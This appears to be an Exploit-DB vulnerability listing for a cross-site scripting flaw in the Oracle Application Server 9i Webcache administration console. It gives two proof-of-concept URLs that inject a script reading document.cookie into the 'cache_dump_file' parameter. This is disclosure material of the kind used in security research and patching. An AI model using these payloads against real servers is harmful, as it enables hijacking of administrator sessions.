Lucene search

K
exploitdbAlexander KornbrustEDB-ID:25562
HistoryApr 28, 2005 - 12:00 a.m.

Oracle Application Server 9i - Webcache Cache_dump_file Cross-Site Scripting

2005-04-2800:00:00
Alexander Kornbrust
www.exploit-db.com
15

AI Score

7.4

Confidence

Low

source : https://www.securityfocus.com/bid/13421/info

A remote cross-site scripting vulnerability affects the Oracle Application Server 9i Webcache administration console. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.

The issue affects the 'cache_dump_file' parameter of the 'webcacheadmin' script. 

http://example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>
http://administrator:[email protected]:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script> 

AI Score

7.4

Confidence

Low

Related for EDB-ID:25562